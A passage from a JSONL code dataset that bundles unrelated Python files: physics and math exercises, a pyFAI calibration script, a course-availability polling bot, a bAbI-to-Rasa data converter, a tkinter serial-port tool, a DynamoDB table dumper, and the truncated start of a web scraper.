eingeben\")\nturboPrallel(limit)\nturbo(limit)\nsumMethod(limit)\n","sub_path":"Python/expert/multiprocessing/primParallel.py","file_name":"primParallel.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"554619825","text":"def numb_increase(): # if there are unless two equal numbers, all numbers will decrease on decreasing numb\n x = int(input('Enter x: '))\n y = int(input('Enter y: '))\n z = int(input('Enter z: '))\n numbers = [x, y, z]\n for i in numbers:\n count = numbers.count(i)\n if count >= 2:\n increasing = int(input('Enter the numb: '))\n numbers = [el + increasing for el in numbers]\n return numbers\n else:\n return 'There is no equal numbers'\n\nprint(numb_increase())\n","sub_path":"numb_increasing.py","file_name":"numb_increasing.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85260395","text":"\"\"\"\ndef f_to_c(temp_input):\n f_temp = temp_input\n c_temp = (f_temp - 32)* 5/9\n print(c_temp)\n return c_temp #ends your function\n\ntemp_input = int(input(\"What is the temperature in Fahrenheit? \"))\n\nf_to_c(temp_input)\n\ndef c_to_f(temo_input):\n c_temp = temp_input\n f_temp = c_temp*(9/5) + 32\n print(f_temp)\n return f_temp #ends your function\n\ntemp_input = int(input(\"What is the temperature in Celsius? \"))\n\nc_to_f(temp_input)\n\"\"\"\n\n\"\"\"\ntrain_mass = int(input(\"What is the train's mass in kg? \"))\ntrain_acceleration = int(input(\"What is the train's acceleration? \"))\n\"\"\"\n\n\"\"\" \nget_force(train_mass, train_acceleration)\n\"\"\"\n\n\"\"\"\ndef get_energy(mass):\n c = 3*10**8\n bomb_energy = mass * c**2\n print(\"A \" + str(mass) + \"kg bomb supplies \" + str(bomb_energy) + \" Joules.\")\n return bomb_energy\n\nmass = int(input(\"What is the mass of the bomb? \"))\nget_energy(mass)\n\"\"\"\n\ndef get_force():\n train_mass = int(input(\"What is the train's mass in kg? \")) # Inputs make more flexible\n train_acceleration = int(input(\"What is the train's acceleration? \"))\n n_force = train_mass*train_acceleration\n print(\"The GE train supplies \" + str(n_force) + \" Newtons of force.\")\n return n_force\n\ndef get_work():\n n_force = get_force() # Calls the get_force() function to eliminate repetition, assigns to n_force as that function provides the force\n n_distance = int(input(\"What is the distance of travel? \"))\n n_work = n_force * n_distance # Calls the global variable - n_force\n print(\"The GE train does \" + str(n_work) + \" Joules of work over \" + str(n_distance) + \" metres.\")\n\nget_work()\n\n","sub_path":"codecademy/Python/code_academy_physics_class.py","file_name":"code_academy_physics_class.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"422524668","text":"\"\"\"This script performs calibration of experiment geometry\"\"\"\n\n\nimport numpy as np\nimport pyFAI\npyFAI.use_opencl = False # It must be set before requesting any OpenCL modules\n\nfrom pyFAI.calibrant import get_calibrant\nfrom pyFAI.geometryRefinement import GeometryRefinement\nimport datetime\n\n\n# Refined gemetry will be saved in this .poni file\nponi_file = \"../../results/intermediate/calibration/Si_17.95keV.poni\"\n\n# Experimental parameters\nwl = 0.6907e-10 # Wavelength in meter\ncal = get_calibrant(\"Si\") # Calibrant used for this experiment\ncal.wavelength = wl\ndet = pyFAI.detectors.Detector(2.53e-5, 2.53e-5) # Pixel size\ndet.max_shape = (2045, 4098) # Detector size in pixels\n\n# Approximate geometry to start with (to be refined by this script)\nd = 1.3e-1 # Distance sample to detector, measured with a ruler\np1 = 2e-3 # Estimated poni1\np2 = 2e-3\nr1 = 0 # rot1\nr2 = 0\nr3 = 0\n\n# Several points on each diffraction ring selected manually from the calibration diffraction image (Si_17.95keV)\np =[]\np.append([854, 21, 0]) # [dim0 (in pixels), dim1, ring index]\np.append([854, 86, 0])\np.append([950, 527, 0])\np.append([1045, 696, 0])\np.append([1217, 902, 0])\np.append([1654, 1155, 0])\np.append([2000, 1206, 0])\np.append([66, 66, 1])\np.append([66, 134, 1])\np.append([70, 186, 1])\np.append([321, 1017, 1])\np.append([499, 1278, 1])\np.append([1110, 1774, 1])\np.append([1193, 1814, 1])\np.append([1519, 1932, 1])\np.append([1837, 1987, 1])\np.append([1926, 1991, 1])\np.append([17, 1250, 2])\np.append([33, 1268, 2])\np.append([123, 1410, 2])\np.append([734, 1994, 2])\np.append([959, 2121, 2])\np.append([1775, 2357, 2])\np.append([1904, 2366, 2])\np.append([246, 2348, 3])\np.append([672, 2616, 3])\np.append([1943, 2943, 3])\np.append([141, 2676, 4])\np.append([712, 2998, 4])\np.append([2018, 3270, 4])\np.append([112, 3290, 5])\np.append([1010, 3666, 5])\np.append([1843, 3800, 5])\np.append([127, 3666, 6])\np.append([707, 3905, 6])\np.append([1431, 4081, 6])\npts = np.array(p, dtype=\"float64\")\n\n\ngeo_ref = GeometryRefinement(data=pts, dist=d, poni1=p1, poni2=p2, rot1=r1, rot2=r2, rot3=r3, detector=det, wavelength=wl, calibrant=cal)\n\n\ngeo_ref.refine2()\n\n\n# generate new .poni file\nwith open(poni_file, \"w\") as poni_f:\n poni_f.write(\"# Calibration done \" + str(datetime.datetime.now()) + \"\\n\")\n poni_f.write(\"PixelSize1: \" + str(geo_ref.pixel1) + \"\\n\")\n poni_f.write(\"PixelSize2: \" + str(geo_ref.pixel2) + \"\\n\")\n poni_f.write(\"Distance: \" + str(geo_ref.dist) + \"\\n\")\n poni_f.write(\"Poni1: \" + str(geo_ref.poni1) + \"\\n\")\n poni_f.write(\"Poni2: \" + str(geo_ref.poni2) + \"\\n\")\n poni_f.write(\"Rot1: \" + str(geo_ref.rot1) + \"\\n\")\n poni_f.write(\"Rot2: \" + str(geo_ref.rot2) + \"\\n\")\n poni_f.write(\"Rot3: \" + str(geo_ref.rot3) + \"\\n\")\n poni_f.write(\"Wavelength: \" + str(geo_ref.wavelength) + \"\\n\")\n","sub_path":"src/processing_scripts/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379554861","text":"\"\"\"\nExample of using a Weibull distribution to represent a RTD, uses function \navailable in the rtd.py module of CpcPy.\n\nCpcPy package available on GitHub at https://github.com/pyrolysis\n\nUpdated 01/27/16 by G.M.W.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as py\nimport cpcpy as cp\n\n# Weibull\n# -----------------------------------------------------------------------------\n\ndef weibull(x, lam, k):\n \"\"\"\n Weibull distribution function.\n \n Parameters\n ----------\n x = time parameter\n k = shape parameter\n lam = lambda as scale parameter\n \n Returns\n -------\n w = weibull distribution\n \"\"\"\n w = (k/lam)*((x/lam)**(k-1))*np.exp(-(x/lam)**k)\n return w\n \n \n# Weibull Distribution\n# -----------------------------------------------------------------------------\n \nx = np.linspace(0, 2.5, 100) # time vector, s\n\nw1 = cp.weibull(x, 1, 0.5) # shape parameter k=1, scale parameter lam=0.5\nw2 = cp.weibull(x, 1, 1) # shape parameter k=1, scale parameter lam=1\nw3 = cp.weibull(x, 1, 1.5) # shape parameter k=1, scale parameter lam=1.5\nw4 = cp.weibull(x, 1, 5) # shape parameter k=1, scale parameter lam=5\n\n# Plot\n# -----------------------------------------------------------------------------\n\npy.close('all')\n\npy.figure(1)\npy.plot(x, w1, lw=2, label='$\\lambda$=1, k=0.5')\npy.plot(x, w2, lw=2, label='$\\lambda$=1, k=1')\npy.plot(x, w3, lw=2, label='$\\lambda$=1, k=1.5')\npy.plot(x, w4, lw=2, label='$\\lambda$=1, k=5')\npy.xlabel('X')\npy.ylabel('Probability density function')\npy.legend(loc='best', numpoints=1)\npy.grid()\n\n","sub_path":"rtd-weibull.py","file_name":"rtd-weibull.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385281638","text":"import urllib.request as request\nimport urllib.parse as parse\nfrom urllib.error import URLError\nimport time\nfrom email.mime.text import MIMEText\nimport smtplib\n\nclass SearchBot:\n ResultOnConsole = True\n MAXTRY = 3600*24*30*2\n\n def __init__(self,CourseArgs,IncludeList = None, ExclueList = None, RstrList = None, MailInfo: ('sender','Password','receiver') = None,\n gap = 1):\n self._CheckRstr = False\n self._CheckIn = False\n self._CheckEx = False\n self._args = CourseArgs\n assert MailInfo==None or len(MailInfo) == 3\n self._Mail = MailInfo\n self._gap = gap\n if RstrList != None:\n self._CheckRstr = True\n self._Rstr = RstrList\n if IncludeList != None:\n self._CheckIn = True\n self._in = IncludeList\n elif ExclueList != None:\n self._CheckEx = True\n self._ex = ExclueList\n\n\n def _request(self):\n para = parse.urlencode(self._args)\n para = para.encode(\"utf8\")\n htRes = request.Request(\"https://www.reg.uci.edu/perl/WebSoc\", data=para)\n txtRes = request.urlopen(htRes)\n txtRes = txtRes.read().decode(\"utf8\")\n return txtRes\n\n def _encodeMail(self,subject,context):\n res = MIMEText(context)\n res[\"Subject\"] = subject\n res[\"From\"] = self._Mail[0]\n res[\"To\"] = self._Mail[2]\n return res\n\n\n def _sendMail(self,msg):\n ser = smtplib.SMTP(\"smtp.gmail.com\")\n ser.starttls()\n ser.login(self._Mail[0], self._Mail[1])\n ser.send_message(msg)\n ser.quit()\n\n def _RstrCheck(self,line):\n Rstr = line.split('')[13][len(''):]\n if 'and' in Rstr:\n Rstr = Rstr.split(' and ')\n for i in Rstr:\n if i in self._Rstr:\n return False\n\n return True\n\n\n def _analyse(self,msg):\n msg = msg.split('\\n')\n courses = []\n for line in msg:\n if line.lstrip().startswith('') or line.lstrip().startswith(''):\n courses.append(line)\n\n success = []\n\n if self._CheckIn:\n for line in courses:\n start = line.index('nowrap=\"nowrap\">')\n courseCode = line[start + len('nowrap=\"nowrap\">'):start + len('nowrap=\"nowrap\">') + 5]\n if courseCode in self._in:\n if 'OPEN' in line:\n if not self._CheckRstr or self._RstrCheck(line):\n success.append(courseCode)\n else:\n for line in courses:\n start = line.index('nowrap=\"nowrap\">')\n courseCode = line[start + len('nowrap=\"nowrap\">'):start + len('nowrap=\"nowrap\">') + 5]\n if courseCode not in self._ex:\n if 'OPEN' in line:\n if not self._CheckRstr or self._RstrCheck(line):\n success.append(courseCode)\n return success\n\n def run(self):\n sendnote = True if self._Mail != None else False\n lastsent = 0\n count = 1\n while True:\n if self.ResultOnConsole:\n print(\"Trying to find course for {} time(s)...\".format(count))\n\n while True:\n try:\n webMsg = self._request()\n except URLError:\n if self.ResultOnConsole:\n print(\"Connection Error, Reconnecting...\")\n time.sleep(1)\n else:\n break\n\n Res = self._analyse(webMsg)\n\n if self.ResultOnConsole:\n for course in Res:\n print('{} is OPEN!!'.format(course))\n\n\n if len(Res) != 0 and sendnote:\n if count - lastsent >= 10 * 50 or lastsent == 0:\n lastsent = count\n msgList = ['{} is OPEN!!'.format(i) for i in Res]\n msg = self._encodeMail(\"Your course is available!!\",'\\n'.join(msgList))\n self._sendMail(msg)\n\n count += 1\n if count>= self.MAXTRY:\n if self.ResultOnConsole:\n print('MAXTRY, BOT STOP')\n break\n time.sleep(1)\n\n\n\n\n\n\n\n","sub_path":"SearchBot.py","file_name":"SearchBot.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299410094","text":"from copy import deepcopy\nimport re\nimport argparse\nimport os.path\nimport json\n\nuser_das = {\n 'greet': [\n '^good morning$',\n '^hello$',\n '^hi$'\n ],\n 'inform': [\n '^i love (?P\\w+) food$',\n '^(?P\\w+) please$',\n '^i am looking for a (?P\\w+) restaurant$', # watchout: not totally sure only price can go there\n '^(i\\'d like to book a table|may i have a table|instead could it be|actually i would prefer|'\n 'can you make a restaurant reservation|can you book a table)?'\n '(( ?with (?P\\w+) (cuisine|food))?( ?in a (?P\\w+) price range)?'\n '( ?for (?P\\w+)( people)?)?( ?in (?P\\w+))?)+( please)?$',\n '^we will be (?P\\w+)$'\n ],\n 'deny': [\n '^no$',\n '^no this does not work for me$',\n '^do you have something else$',\n '^no i don\\'t like that$'\n ],\n 'affirm': [\n '^it\\'s perfect$',\n '^i love that$',\n '^let\\'s do it$',\n '^that looks great$'\n ],\n 'request_phone': [\n '^may i have the phone number of the restaurant$',\n '^what is the phone number of the restaurant$',\n '^do you have its phone number$'\n ],\n 'request_address': [\n '^may i have the address of the restaurant$',\n '^do you have its address$',\n '^can you provide the address$'\n ],\n 'thankyou': [\n '^thanks$',\n '^thank you$',\n '^you rock$'\n ],\n 'bye': [\n '^no thank you$',\n '^no thanks$'\n ],\n 'silence': [\n '^$'\n ]\n}\nfor da in user_das:\n user_das[da] = [re.compile(pattern) for pattern in user_das[da]]\n\n\nbot_das = {\n 'give_phone': [\n '^here it is \\w+phone$'\n ],\n 'give_address': [\n '^here it is \\w+address$'\n ],\n 'suggest_restaurant': [\n '^what do you think of this option: \\w+$'\n ],\n 'announce_search': [\n '^ok let me look into some options for you$'\n ],\n 'request_updates': [\n '^sure is there anything else to update$'\n ],\n 'announce_keep_searching': [\n '^sure let me find an other option for you$'\n ],\n 'api_call': [\n '^api_call \\w+ \\w+ \\w+ \\w+$'\n ],\n 'reserve': [\n '^great let me do the reservation$'\n ],\n 'greet': [\n '^hello what can i help you with today$'\n ],\n 'on_it': [\n '^i\\'m on it$'\n ],\n 'ask_location': [\n '^where should it be$'\n ],\n 'ask_number_of_people': [\n '^how many people would be in your party$'\n ],\n 'ask_price': [\n '^which price range are looking for$'\n ],\n 'ask_cuisine': [\n '^any preference on a type of cuisine$'\n ],\n 'ask_anything_else': [\n '^is there anything i can help you with$'\n ],\n 'bye': [\n '^you\\'re welcome$'\n ]\n}\n\n\nfor da in bot_das:\n bot_das[da] = [re.compile(pattern) for pattern in bot_das[da]]\n\n\ndef get_user_act(text):\n \"\"\"\n Determines the dialog act of a bAbI t5 user utterance\n :param text: user utterance\n :return: da of the utterance (str) or None if no match found\n \"\"\"\n for act in user_das:\n for pattern in user_das[act]:\n match = pattern.search(text)\n if match:\n return act, [{\"start\": match.span(ent)[0], \"end\": match.span(ent)[1], \"value\": val, \"entity\": ent}\n for ent, val in match.groupdict().items() if val]\n return None\n\n\ndef get_bot_act(text):\n \"\"\"\n Determines the dialog act of a bAbI t5 bot utterance\n :param text: bot utterance\n :return: da of the utterance (str) or None if no match found\n \"\"\"\n for act in bot_das:\n for pattern in bot_das[act]:\n if pattern.search(text):\n return act\n return None\n\n\ndef babi_dialogue_iterator(babi_filename):\n \"\"\"\n Generator for bAbI stories. Skips api call results\n :param babi_filename: bAbI file name\n :return: list of message exchanges, as dictionaries with 'human', 'bot' pairs\n \"\"\"\n story = []\n with open(babi_filename, 'r') as babi_file:\n for line in babi_file:\n if line == '\\n': # end of story\n _story = deepcopy(story)\n story = []\n yield _story\n chunks = line.split('\\t')\n chunks[0] = ' '.join(chunks[0].split(' ')[1:]) # rid of initial number\n if len(chunks) == 1: # api call results, garbage\n continue\n elif len(chunks) == 2: # normal line\n human, bot = chunks\n story.append({'human': human, 'bot': bot[:-1]}) # removing final \\n\n else:\n raise Exception('Unknown formatted line: {}'.format(line))\n\n\ndef produce_nlu_training_file(input_filename, output_filename):\n result = {\"rasa_nlu_data\": {\"common_examples\": [], \"entity_examples\": [], \"intent_examples\": []}}\n for story in babi_dialogue_iterator(input_filename):\n for turn in story:\n text = turn['human']\n intent, entities = get_user_act(text)\n result[\"rasa_nlu_data\"][\"common_examples\"].append({\"text\": text, \"intent\": intent, \"entities\": entities})\n with open(output_filename, 'w') as output_fh:\n json.dump(result, output_fh, indent=2)\n\n\ndef rasafy(intent, entities):\n if entities:\n return intent + '{' + ', '.join(['\"{}\": \"{}\"'.format(e['entity'], e['value']) for e in entities]) + '}'\n else:\n return intent\n\n\ndef produce_dialog_training_file(input_filename, output_filename, action_prefixes=None):\n action_prefixes = {action: '' for action in bot_das} if not action_prefixes else action_prefixes\n with open(output_filename, 'w') as output_fh:\n for i, story in enumerate(babi_dialogue_iterator(input_filename)):\n output_fh.write('## {}'.format(i) + '\\n')\n for turn in story:\n intent, entities = get_user_act(turn['human'])\n bot_says = get_bot_act(turn['bot'])\n output_fh.write('* ' + rasafy(intent, entities) + '\\n')\n output_fh.write(' - ' + action_prefixes[bot_says] + bot_says + '\\n')\n output_fh.write('\\n')\n\n\ndef _basic_checks(args):\n if args.task not in ['nlu', 'dialog']:\n raise ValueError('invalid value for argument task: {}\\nMust be either nlu or dialog'.format(args.task))\n if not args.input:\n raise Exception('argument --input is mandatory')\n if not os.path.isfile(args.input):\n raise FileNotFoundError('file {} does not exist'.format(args.input))\n if not args.output:\n raise Exception('argument --output is mandatory')\n return args\n\n\ndef _get_args():\n parser = argparse.ArgumentParser(\n description='produce Rasa format training files')\n parser.add_argument(\n 'task',\n choices=[\"nlu\", \"dialog\"],\n help=\"nlu: produce nlu training file\\ndialog: produce keras policy training file\")\n parser.add_argument('--input', type=str, help='input file name')\n parser.add_argument('--output', type=str, help='output file name')\n parser.add_argument('--utter-prefixes', action='store_true', default=False)\n return _basic_checks(parser.parse_args())\n\n\nif __name__ == '__main__':\n args = _get_args()\n if args.task == \"nlu\":\n produce_nlu_training_file(args.input, args.output)\n elif args.task == \"dialog\":\n prefixes = {action: 'utter_' for action in bot_das} if args.utter_prefixes else None\n produce_dialog_training_file(args.input, args.output, prefixes)\n","sub_path":"babit5/data/babi_reader.py","file_name":"babi_reader.py","file_ext":"py","file_size_in_byte":7570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5909790","text":"# coding:UTF-8\r\n\r\nimport tkinter\r\nfrom tkinter import ttk, filedialog, messagebox, scrolledtext\r\nfrom tkinter import *\r\nimport openpyxl\r\nimport threading\r\nimport time\r\nimport serial\r\nimport re #正则表达式,可匹配任何字段\r\nimport serial.tools.list_ports #获取串口名直接调用这个工具\r\n#from code_dic import MY_CODE\r\n\r\n\r\nclass MY_GUI():\r\n\r\n # 构造函数\r\n def __init__(self, name):\r\n self.init_window_name = name\r\n\r\n # 窗口控件设置初始化\r\n def set_init_window(self): # 控件设置的内容主要是这个函数,使用非常简单,主要是调用并设置参数\r\n self.init_window_name.title('串口控制')\r\n self.init_window_name.geometry('1168x631+20+10')\r\n self.init_window_name['bg'] = 'pink'\r\n self.init_window_name.attributes('-alpha', 1)\r\n # 每个控件都需要用pack、place、grid布局去安置,就是设计了一个控件,要放在什么位置的意思。\r\n # 按钮\r\n self.file_choose_button = Button(self.init_window_name, text='选择文件', bg='lightblue', width=10,\r\n command=self.thread_file)\r\n self.file_choose_button.place(x=40, y=170) # place布局,x、y指的是距离父窗口左上端点的位置,像素位置\r\n self.conduct_button = Button(self.init_window_name, text='执行', bg='lightblue', width=10,\r\n command=self.com_output)\r\n self.conduct_button.place(x=40, y=455)\r\n self.log_save_button = Button(self.init_window_name, text='保存日志', bg='lightblue', width=10,\r\n command=self.thread_save)\r\n self.log_save_button.place(x=335, y=455)\r\n self.clear_button = Button(self.init_window_name, text='清空', bg='lightblue', width=10,\r\n command=self.thread_clear)\r\n self.clear_button.place(x=460, y=455)\r\n # 按钮的command参数必须要指向一个函数进行调用,我这里用多线程实现,可以使各按钮的功能无干涉\r\n # 串口选择框架\r\n self.com_choose_frame = Frame(self.init_window_name)\r\n self.com_choose_frame.place(x=20, y=12)\r\n # 框架容纳多个控件,使界面布局更有层次感\r\n # 串口选择框架内部标签,标签的值一般不做改变\r\n self.com_label = Label(self.com_choose_frame, text='COMx: ')\r\n self.com_label.grid(row=0, column=0, sticky=E)\r\n self.baudrate_label = Label(self.com_choose_frame, text='Baudrate: ')\r\n self.baudrate_label.grid(row=1, column=0, sticky=E, pady=10)\r\n # 串口框架内部下拉选项框\r\n self.com_choose = StringVar()\r\n self.com_choose_combo = ttk.Combobox(self.com_choose_frame, width=30, textvariable=self.com_choose)\r\n self.com_choose_combo['state'] = 'readonly'\r\n self.com_choose_combo.grid(row=0, column=1, padx=15) # grid是表格式结构,行列都从0开始,padx表示x方向上两栏的间距\r\n self.com_choose_combo['values'] = self.com_name_get() # 这里调用了一个函数,函数的返回值是一个数组\r\n # 下拉选项框下拉的时候出现很多选项,选中之后只显示选中的选项\r\n # 波特率选项框\r\n self.baudrate_value = StringVar(value='9600') # StringVar是一个字符串变量控件\r\n self.baudrate_choose_combo = ttk.Combobox(self.com_choose_frame, width=30, textvariable=self.baudrate_value)\r\n # 选项框中选中的值会赋值给字符串变量,并显示在combobox上\r\n self.baudrate_choose_combo['values'] = ('9600', '115200')\r\n self.baudrate_choose_combo['state'] = 'readonly'\r\n self.baudrate_choose_combo.grid(row=1, column=1, padx=15)\r\n # 串口框架内部按钮\r\n self.connect_button = Button(self.com_choose_frame, text='连接', bg='lightblue', width=10,\r\n command=self.com_connect)\r\n self.connect_button.grid(row=0, column=2, padx=15)\r\n self.cancel_button = Button(self.com_choose_frame, text='取消', bg='lightblue', width=10, command=self.com_cancel)\r\n self.cancel_button.grid(row=1, column=2, padx=15)\r\n\r\n # 处理结果显示滚动文本框\r\n self.result_text = scrolledtext.ScrolledText(self.init_window_name, width=77, height=42)\r\n self.result_text.place(x=600, y=50)\r\n # 滚动文本框是tkinter库自带的一个小封装,将text构件scrollbar滚动条控件组合形成的,可以直接调用\r\n # 其他文本框\r\n self.file_path_text = Text(self.init_window_name, width=57, height=1)\r\n self.file_path_text.place(x=150, y=175)\r\n self.com_log_text = Text(self.com_choose_frame, width=78, height=5)\r\n self.com_log_text.grid(row=2, column=0, columnspan=3, pady=5)\r\n self.com_log_text.insert(END, '此处显示串口工作信息' + '\\n') # 这一句给字符串变量赋初值\r\n\r\n # 标签\r\n self.result_data_label = Label(self.init_window_name, text='输出结果')\r\n self.result_data_label.place(x=600, y=15)\r\n self.num_input_label = Label(self.init_window_name, text='输入编号: ')\r\n self.num_input_label.place(x=150, y=460)\r\n\r\n # 输入编号框\r\n self.input_num = StringVar()\r\n self.input_num_entry = Entry(self.init_window_name, textvariable=self.input_num, width=10)\r\n self.input_num_entry.place(x=215, y=460)\r\n\r\n # 代码解析后进行显示\r\n self.code_frame = Frame(self.init_window_name, width=78, height=29, bg='white')\r\n self.code_frame.place(x=20, y=210)\r\n # 解析后的代码放在表格内显示\r\n self.code_tree = ttk.Treeview(self.code_frame, show='headings', height=10, columns=('0', '1', '2', '3', '4'))\r\n # show='headings'会隐藏首列,否则首列太宽\r\n self.code_bar = ttk.Scrollbar(self.code_frame, orient=VERTICAL, command=self.code_tree.yview)\r\n self.code_tree.configure(yscrollcommand=self.code_bar.set)\r\n self.code_tree.grid(row=0, column=0, sticky=NSEW)\r\n self.code_bar.grid(row=0, column=1, sticky=NS)\r\n self.code_tree.column('0', width=30)\r\n self.code_tree.column('1', width=250)\r\n self.code_tree.column('2', width=50)\r\n self.code_tree.column('3', width=100)\r\n self.code_tree.column('4', width=100)\r\n self.code_tree.heading('0', text='序号')\r\n self.code_tree.heading('1', text='命令')\r\n self.code_tree.heading('2', text='状态')\r\n self.code_tree.heading('3', text='失败则执行次数')\r\n self.code_tree.heading('4', text='再失败则跳转至')\r\n\r\n # 执行结果显示frame\r\n self.result_frame = Frame(self.init_window_name, width=78, height=15, bg='white')\r\n self.result_frame.place(x=20, y=500)\r\n self.result_tree = ttk.Treeview(self.result_frame, show='headings', height=4, columns=('0', '1', '2'))\r\n self.result_bar = ttk.Scrollbar(self.result_frame, orient=VERTICAL, command=self.result_tree.yview)\r\n self.result_tree.configure(yscrollcommand=self.result_bar.set)\r\n self.result_tree.grid(row=0, column=0, sticky=NSEW)\r\n self.result_bar.grid(row=0, column=1, sticky=NS)\r\n self.result_tree.column('0', width=30)\r\n self.result_tree.column('1', width=80)\r\n self.result_tree.column('2', width=420)\r\n self.result_tree.heading('0', text='编号')\r\n self.result_tree.heading('1', text='是否成功')\r\n self.result_tree.heading('2', text='从哪句指令开始失败')\r\n\r\n # 自动获取当前连接的串口名\r\n def com_name_get(self):\r\n self.port_list = list(serial.tools.list_ports.comports())\r\n self.com_port_names = []\r\n self.pattern = re.compile(r'[(](.*?)[)]', re.S)\r\n if len(self.port_list) > 0:\r\n for i in range(len(self.port_list)):\r\n self.com_name = re.findall(self.pattern, str(self.port_list[i]))\r\n self.com_port_names.append(self.com_name)\r\n return self.com_port_names\r\n\r\n # 连接按键的执行内容\r\n def com_connect(self):\r\n self.result_text.insert(END, '请连接串口设备' + '\\n')\r\n self.ser_name = str(self.com_choose.get())\r\n self.ser_baudrate = str(self.baudrate_value.get())\r\n try:\r\n self.ser = serial.Serial(self.ser_name)\r\n self.ser.baudrate = self.ser_baudrate\r\n self.ser.timeout = 0.5\r\n self.com_log_text.insert(END, time.ctime(time.time()) + '\\t\\t' + '串口成功打开' + '\\n')\r\n self.com_log_text.see(tkinter.END)\r\n self.com_log_text.update()\r\n while True:\r\n newline = self.ser.readline() # 字节类型\r\n self.result_text.insert(END, newline)\r\n self.result_text.see(tkinter.END)\r\n self.result_text.update()\r\n except:\r\n newline = time.ctime(time.time()) + '\\t\\t' + '串口打开故障或串口被关闭' + '\\n'\r\n self.com_log_text.insert(END, newline)\r\n self.com_log_text.see(tkinter.END)\r\n self.com_log_text.update()\r\n\r\n # 取消按键的执行内容\r\n def com_cancel(self):\r\n pass\r\n\r\n # 执行按键的执行内容\r\n def com_output(self):\r\n pass\r\n\r\n # 新建线程,负责选择代码文件、保存代码执行结果和清空代码表格\r\n\r\n # 新建选择文件线程\r\n def thread_file(self):\r\n thisthread = threading.Thread(target=self.file_choose)\r\n thisthread.start()\r\n\r\n # 选择文件打开,并在界面中显示\r\n def file_choose(self):\r\n pass\r\n\r\n # 新建线程保存执行结果\r\n def thread_save(self):\r\n thisthread = threading.Thread(target=self.code_log_save)\r\n thisthread.start()\r\n\r\n # 保存代码执行结果日志\r\n def code_log_save(self):\r\n pass\r\n\r\n # 新建线程清空所选文件以备重新选择\r\n def thread_clear(self):\r\n thisthread = threading.Thread(target=self.file_clear)\r\n thisthread.start()\r\n\r\n # 删除所选文件,清空解析后的代码表格\r\n def file_clear(self):\r\n pass\r\n\r\n\r\n# 主线程\r\ndef start():\r\n init_window = Tk() # 因为写了一个类,所以要产生一个窗口对象,调用类的函数,进行窗口的构造和控件设置\r\n my_window = MY_GUI(init_window)\r\n my_window.set_init_window()\r\n init_window.mainloop()\r\n\r\n\r\nstart()\r\n","sub_path":"UsartTool_Thinker.py","file_name":"UsartTool_Thinker.py","file_ext":"py","file_size_in_byte":10572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"2646914","text":"# from heapq import heappop, heappush\n\n\ndef topo_sort(n, graph):\n indeg, idx = [0] * n, [0] * n\n for i in range(n):\n for e in graph[i]:\n indeg[e] += 1\n\n q, res = [], []\n for i in range(n):\n if indeg[i] == 0:\n q.append(i) # heappush(q, -i)\n\n nr = 0\n while q:\n res.append(q.pop()) # res.append(-heappop(q))\n idx[res[-1]], nr = nr, nr + 1\n for e in graph[res[-1]]:\n indeg[e] -= 1\n if indeg[e] == 0:\n q.append(e) # heappush(q, -e)\n\n return res, idx, nr == n\n","sub_path":"snippets/Graphs/topo_sort.py","file_name":"topo_sort.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"367812328","text":"\nimport os,sys\nimport boto3\nfrom pprint import pprint\n\nimport json\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../aws/')))\nimport db_access\n\n#-------------------------\n# For local dynamodb\n#-------------------------\nLOCAL_DYNAMODB_ENDPOINT = os.environ.get(\"LOCAL_DYNAMODB_ENDPOINT\", \"http://127.0.0.1:8000\")\ndynamodb = boto3.resource(\"dynamodb\", region_name=\"us-east-1\", endpoint_url=LOCAL_DYNAMODB_ENDPOINT)\n\n#-------------------------\n# connect to aws\n#-------------------------\n#dynamodb = boto3.session.Session(profile_name='tr-fr-sandbox').resource('dynamodb')\n\n\ndef dump_data(tbl_obj, out_file, max_size, batch_size=1000):\n fout = open(out_file, 'wt')\n (items, exclude_key) = db_access.scan_simp(tbl_obj, limit = batch_size, max_scan_size = max_size)\n if exclude_key:\n msg = \"more data are available...\"\n else:\n msg = \"all data have returned...\"\n print(\"Total returned items: {}, {}\".format(len(items), msg))\n\n print(\"Writing to file: {}\".format(out_file))\n for item in items:\n #print(type(item))\n #print(json.dumps(item))\n fout.write(json.dumps(item) + \"\\n\")\n \n fout.close()\n print(\"Done.\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"Usage:\")\n print(\"\\t{} table-name max_size [out_filename]\".format(sys.argv[0]))\n\n print(\"\\te.g. {} bba.data.data_tracking 1000 data_tracking.json\".format(sys.argv[0]))\n exit(0)\n \n tbl_name = sys.argv[1]\n max_size = int(sys.argv[2])\n out_file = \"../temp/\" + tbl_name + \".out.json\"\n if len(sys.argv) > 3: \n out_file = \"../temp/\" + sys.argv[3] \n \n print(\"Start to scan {}, and dump data to {}\".format(tbl_name, out_file))\n tbl_obj = dynamodb.Table(tbl_name)\n dump_data(tbl_obj, out_file, max_size)\n\n\n","sub_path":"python/aws_tools/dump_data.py","file_name":"dump_data.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"371022973","text":"import requests\nfrom urllib.parse import urlencode\nfrom requests import codes\nimport os\nfrom hashlib import md5\nfrom multiprocessing import Pool\nimport re\n\ndef get_page(offset, keyword):\n headers = {\n 'authority': 'www.toutiao.com',\n 'cookie': 'tt_webid=6746149885919299083; 